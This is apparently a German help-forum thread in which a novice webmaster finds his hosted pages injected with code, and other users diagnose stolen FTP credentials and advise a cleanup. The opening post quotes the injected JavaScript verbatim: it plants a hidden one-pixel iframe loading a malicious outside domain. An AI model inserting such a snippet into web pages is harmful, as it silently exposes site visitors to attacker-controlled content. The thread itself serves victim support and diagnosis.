Solaris: Auf dem Server wird der Quelltext verändert

Hallo

Ich bin eher Anfänger, arbeite mit dem Phase5-Editor und lade meine Seiten mit FileZilla auf den Server.

Bei verschiedenen hochgeladenen Seiten stelle ich fest, dass sich nach Tagen oder Wochen der Quelltext verändert, und zwar wird jeweils das folgende irgendwo in der Seite eingefügt:

<script type="text/javascript" language="javascript" >
(function(){var a = document.createElement('iframe');a.src = 'http://beforew.com';a.style.position = 'absolute';a.style.border = '0';a.style.height = '1px';a.style.width = '1px';a.style.left = '1px';a.style.top = '1px';if(!document.getElementById('d6f39715')){document.write('<div id='d6f39715'></div>');document.getElementById('d6f39715').appendChild(a);}})();</script><!--/a6f227-->

Ich habe keinen blassen Schimmer was das bedeutet, und warum das in meine Seiten eingefügt wird (wer macht das???).

Ich stelle aber fest, dass wenn dieser Text im Quelltext drin ist, es Probleme mit der "zurück-Funktion" gibt, zumindest bei meinem Internet-Explorer. Konkret: Wenn ich die Seite mit dem Explorer anklicke und dann wieder zurück auf die vorherige Seite will, dann muss ich meist zwei oder dreimal den Zurück-Button klicken bevor sich etwas tut.

Meine eigentliche Frage lautet aber: Warum wird der Quelltext auf dem Server verändert und der obige Text eingefügt?

Kann mir da jemand weiterhelfen? Danke.

  1. Hallo,

    was sagt den der Provider dazu?

    Viele Grüße
    Siri

    1. Hallo,

      was sagt den der Provider dazu?

      Viele Grüße
      Siri

      Ich habe heute vormittag dort angerufen und die Person die dran hat solange Fachbegriffen und Erklärungen um sich geworfen (ich habe kaum etwas verstanden, bin wirklich eher Anfänger) bis ich den Eindruck hatte, es liege wohl an mir oder meinem Programm oder ich mache irgendwas falsch.

      Er hat gesagt, dass sich der Quelltext durchaus auf dem Server ändern könne, zum Beispiel wenn ich einen Zähler eingebaut hätte, würde jedes anklicken der Seite den Quellcode verändern. Weiter könne sich bei bestimmten Programmen zum Webseiten erstellen im Hintergrund etwas verändern ohne dass ich es merken würde und dann gäbe es noch Programme, die Seiten automatisch hochladen würden oder irgendsowas.

      Auf jeden Fall wusste ich am Schluss nicht mehr was ich sagen soll und ob vielleicht der Fehler nicht bei mir liegt. Also bin ich jetzt hier.....

      Danke und Grüsse Solaris

      1. Auf jeden Fall wusste ich am Schluss nicht mehr was ich sagen soll und ob vielleicht der Fehler nicht bei mir liegt. Also bin ich jetzt hier.....

        Hast du ihn mit genau deiner Seite gefragt oder allgemein?
        Lass die doch mal deine Seite checken, nicht irgendwas von Zähler und so erzählen was natürlich sein kann, was aber bei dir kein bisschen relevant ist.
        Die wissen dazu sicher mehr als wir hier, denn von uns kann keiner auf deinen Webspace schauen.

  2. Tach!

    Meine eigentliche Frage lautet aber: Warum wird der Quelltext auf dem Server verändert und der obige Text eingefügt?

    Jemand hat Zugriff auf d(ein)en Server und hängt Schadcode an deine Dateien. Server neu aufsetzen, sichere Passwörter verwenden, alles sperren was nicht benötigt wird. Und wenn es nicht dein Server ist, solltest du den zuständigen Admin benachrichtigen.

    dedlfix.

    1. Jemand hat Zugriff auf d(ein)en Server und hängt Schadcode an deine Dateien. Server neu aufsetzen, sichere Passwörter verwenden, alles sperren was nicht benötigt wird. Und wenn es nicht dein Server ist, solltest du den zuständigen Admin benachrichtigen.

      dedlfix.

      Hey, jetzt machst du mir aber richtig Angst. Ich hatte vor kurzem trotz Panda Antivirus einen Trojaner auf dem System (angeblich von der Bundespolizei) und habe ihn dann mit der folgenden Anleitung weggemacht.

      Heute habe ich festgestellt, dass eine Datei, die ich hochladen wollte, fehlte.

      Der Server ist natürlich nicht von mir. Soll ich jetzt dort anrufen und sagen, dass ich die Vermutung hätte, jemand hätte Zugriff auf meine Webseite? Oder reicht es (vorerst) wenn ich die Passwörter ändere? Oder muss ich etwa auch noch meinen Computer neu aufsetzen..... und und und ... puhh...

      1. Tach!

        Jemand hat Zugriff auf d(ein)en Server und hängt Schadcode an deine Dateien. Server neu aufsetzen, sichere Passwörter verwenden, alles sperren was nicht benötigt wird. Und wenn es nicht dein Server ist, solltest du den zuständigen Admin benachrichtigen.
        Der Server ist natürlich nicht von mir. Soll ich jetzt dort anrufen und sagen, dass ich die Vermutung hätte, jemand hätte Zugriff auf meine Webseite?

        Wenn du den Server nicht von fachkundigem Personal untersuchen lässt, kann die Sicherheitslücke auch weiterbestehen bleiben. Prinzipiell kann das Loch überall und nirgends sein.

        Oder reicht es (vorerst) wenn ich die Passwörter ändere?

        Wenn du Glück hast, hat nur jemand ein Passwort erraten. Dann kann das Ändern helfen, wenn nur die Dateien verändert wurden, keine Backdoor eingebaut wurde und auch kein anderer den Server mitnutzt. Wenn du Massenhosting-Kunde bist, kann die Lücke auch bei anderen Accounts zu finden sein. Zu lasch vergebene Dateiberechtigungen können dann eine Ursache für einen Zugriff von nebenan sein. Das Sicherheitskonzept muss aber ordentlich geplant und umgesetzt sein. Wenn zum Beispiel alle Kunden über denselben Webserver-Account laufen, kann man da nichts trennen.

        Oder muss ich etwa auch noch meinen Computer neu aufsetzen..... und und und ... puhh...

        Kannst du es ausschließen, dass die Veränderung nicht beim Upload-Prozess passiert ist, dann hast du möglicherweise kein Problem auf deinem Rechner. Dazu müssen aber auch deine Browser unanfällig für den Schadcode sein, denn du ja zweifelsohne beim Besuch deiner Seiten auch in deinen Browser geladen hast.

        dedlfix.

        1. Tach!
          dedlfix.

          Vielen Dank für deine sehr hilfreichen Antworten dedlfix !

          Ich wohne in der Schweiz und bin (Massen)Kunde bei Swisscom. Die sollten sicherheitsmässig und so eigentlich top sein. Aber man weiss halt nie.

          Auf jeden Fall habe ich jetzt schon mal die Passwörter geändert und schaue jetzt ob es weiterhin Veränderungen und Probleme gibt.

          Danke !

  3. Hi,

    siehe https://forum.selfhtml.org/?t=211587&m=1444068. Die Diskussion hatten wir erst vor kurzem.

    cu,
    Andreas

    --
    Warum nennt sich Andreas hier MudGuard?
    O o ostern ...
    Fachfragen per Mail sind frech, werden ignoriert. Das Forum existiert.
    1. Hi,

      siehe https://forum.selfhtml.org/?t=211587&m=1444068. Die Diskussion hatten wir erst vor kurzem.

      cu,
      Andreas

      Vielen Dank für den Superhinweis! *Daumen hoch*

      Das Problem scheint der Ftp-Client Filezilla zu sein, wo ein Virus/Wurm eingeführt wird.

      Die beiden hilfreichsten Link, auf die ich bis jetzt gestossen bin:
      Seite gehackt
      Filezilla Alternative

      Mal schauen ob ich es damit hinbekomme. Einen wichtigen Schritt weiter bin ich jetzt auf jeden Fall, danke allen hier!

  4. Ich stelle aber fest, dass wenn dieser Text im Quelltext drin ist, es Probleme mit der "zurück-Funktion" gibt, zumindest bei meinem Internet-Explorer.

    Da Deine Webseite aussieht als wäre diese verseucht UND weil Du diese ausgerechnet noch mit dem Internet Explorer geöffnet hast kannst Du weder auf Deinen Rechner noch auf die Sicherheit Deines Webservers vertrauen. Du bist schon Opfer und hilfst mit der Weiterverbreitung Kriminellen.

    Was lauft denn auf Deinem Webserver so? Ich meine Fertigsoftware wie Gästebuch, Formmailer, Wordpress mit welchen Plugins? Gibt es Dateien, die zu ungewöhnlichen Zeitpunkten verändert wurden? Requests mit ungewöhnlichen Datenmengen? Serien von Requests auf nicht vorhandene Ressorcen, dann auf vorhandene - das alles kann der Telefonabwimmler vom Support Deines Hosters gar nicht prüfen. Frag den abuse@hoster.

    Kann mir da jemand weiterhelfen? Danke.

    Ja, Alles plattmachen, neu aufsetzen.

    Technische Informationen:

    Der iframe kommt von beforew.com

    Domain name: beforew.com

    Registrant Contact:
    Whois Privacy Protection Service
    Whois Agent gmvjcxkxhs@whoisservices.cn
    +86.05922577888 fax: +86.05922577111
    No. 61 Wanghai Road, Xiamen Software Park
    xiamen fujian 361008
    cn

    beforew.com hat die IP 31.184.192.237, diese hat als weitere A-Records im DNS die Domain getyourbet.org. Und die ist schon längst bekannt.

    Sieht nach einer russischen Bande aus, die Pishing betreibt. Onlinebanking und dergleichen würde ich mit Deinem Rechner nicht mehr machen wollen.

    1. Da Deine Webseite aussieht als wäre diese verseucht UND weil Du diese ausgerechnet noch mit dem Internet Explorer geöffnet hast kannst Du weder auf Deinen Rechner noch auf die Sicherheit Deines Webservers vertrauen.

      Okay, dann machen wir hier doch ein bisschen Anfängerschulung (ich bin der Anfänger). Welchen Browser empfiehlt man hier denn so?

      Und wenn wir schon dabei sind: Ich habe Panda Antivirus, was taugt das?

      Was lauft denn auf Deinem Webserver so? Ich meine Fertigsoftware wie Gästebuch, Formmailer, Wordpress mit welchen Plugins? Gibt es Dateien, die zu ungewöhnlichen Zeitpunkten verändert wurden? Requests mit ungewöhnlichen Datenmengen?

      Wie gesagt, ich bin ein knapper Amateur, weiss nicht mal was ein Formmailer ist, Wordpress mit Plugins kann ich dir auch keine Antwort geben. Gästebuch gibt es nicht.

      Meine Webseite wurde mit dem Homepagetool erstellt, das ist ein Gratisprogramm  des Webhosters (Swisscom) mit dem man Webseiten erstellen kann. 8 Seiten sind im Grundpaket inbegriffen. Neben diesen 8 Seiten habe ich aber diverse weitere Seiten mit dem phase5 Editor selbst zusammengebastelt und diese dann mit Filezilla hochgeladen. Filezilla ist mittlerweile entfernt (nachdem ich an anderer Stelle jetzt gelesen habe, dass dieser anfällig ist für Würmer, Viren usw.) Verwende seit heute den Ruff-FTP.

      Neben dem zusätzlichen Quellcode, den ich im Eingangspost erwähnt habe und von der mehrere Seiten mehrfach befallen wurden, habe ich noch einige Seiten, wo ich youtube-Videos eingebunden habe. Diese Videos wurden mir mehrfach komplett gelöscht und bis auf eine paar wenige Zeilen Text war die Seite jeweils leer.

      Ich gehe jetzt mal nach dieser Anleitung vor und schau ob ich die Probleme damit lösen kann.

      Den Computer musste ich in diesem Jahr schon zweimal komplett neu aufsetzen, nachdem ich vorher während etwa 8 Jahren von solchen (mühsamen) Aktionen verschont blieb. Wenns nicht unbedingt sein muss hab ich keine Lust auf ein drittes Mal. Die Webseiten komplett löschen geht gar nicht (na ja ginge schon), aber dann müsste ich mindestens die 8 Seiten welche ich mit dem Homepagetool erstellt habe völlig neu machen, (und das bedeutet schätzungsweise mindestens 10 Stunden Arbeit und dass meine Webseite ebenso lange offline ist), und da hab ich vorderhand keinen Bock drauf.

      1. Okay, dann machen wir hier doch ein bisschen Anfängerschulung (ich bin der Anfänger). Welchen Browser empfiehlt man hier denn so?

        Alles außer dem IE und auch Google-Chrome nur mit erheblichen Bauchschmerzen.

        und dass meine Webseite ebenso lange offline ist), und da hab ich vorderhand keinen Bock drauf.

        Wenn Deine Webseite auf vielen Geräten nicht mehr abrufbar ist, weil deren Administratoren elektronisch abrufbaren Listen mit verseuchten Webseiten vertrauen(so wie Du dem Panda-Antivirus), dann ist die praktisch auch offline...

        Meine Webseite wurde mit dem Homepagetool erstellt, das ist ein Gratisprogramm  des Webhosters (Swisscom) mit dem man Webseiten erstellen kann.

        Scheinbar ist da nichts, was Du unter Kontrolle hast und was den Schaden verursachen kann - Sollte das Problem erneut auftauchen, dann nimm den Hoster in die Pflicht.

        Ich gehe jetzt mal nach dieser Anleitung vor und schau ob ich die Probleme damit lösen kann.

        Zitat:

        Der Filezilla Trojaner bzw. Filezilla Hack oder auch FTP Server Hack

        Dieser Virus/Trojaner läuft auf Deinem lokalen Rechner oder auf dem Deiner Kollegen. Der eigentliche Code auf dem lokalen System schnappt sich FTP-Zugangsdaten, die er finden kann und loggt sich damit bei den jeweiligen FTP-Servern ein.

        Dein System ist also verseucht. Der Trojaner hat bereits Deine Zugangdaten. Es ist schon sehr mutig, das System nicht neu aufsetzen zu wollen.

        Wieviel hast Du auf der Bank? Ich meine so ein Schweitzer Konto zu kapern wird sich für die armen russischen Hacker lohnen. Die annoncieren schon fleißig nach Transferagenten, die mit 3 Stunden pro Woche CHF 6000 monatlich abfassen wollen... und zu dem muss das viele schöne Geld nicht weit transportiert werden: Jetzt, wo Banken auf Zypern nicht mehr als "safe harbor" gelten können wird vieles davon in der Schweiz bleiben und von Eurem schönen Bankgeheimnis profitieren, als wären die die deutsche CDU, CSU oder gar die FDP.

        Fred

        1. Dein System ist also verseucht. Der Trojaner hat bereits Deine Zugangdaten. Es ist schon sehr mutig, das System nicht neu aufsetzen zu wollen.

          Wieviel hast Du auf der Bank? Ich meine so ein Schweitzer Konto zu kapern wird sich für die armen russischen Hacker lohnen. Die annoncieren schon fleißig nach Transferagenten, die mit 3 Stunden pro Woche CHF 6000 monatlich abfassen wollen... und zu dem muss das viele schöne Geld nicht weit transportiert werden: Jetzt, wo Banken auf Zypern nicht mehr als "safe harbor" gelten können wird vieles davon in der Schweiz bleiben und von Eurem schönen Bankgeheimnis profitieren, als wären die die deutsche CDU, CSU oder gar die FDP.

          Danke für deine Infos.

          Ich mache kein online-Banking und habe keinerlei Bankdaten auf meinem Computer. Das einzige was ich etwa alle zwei Jahre mal über den Computer mache (weil ich es anderswo nicht bekomme) ist mit der Kreditkarte zahlen. Das mache ich jetzt aber bis auf Weiters nicht. Zusätzlich liegt mein Limit bei der Kreditkarte bei Fr. 1'000.- so dass sich ein allfälliger Klau im Rahmen halten würde.

          Grüsse aus der Schweiz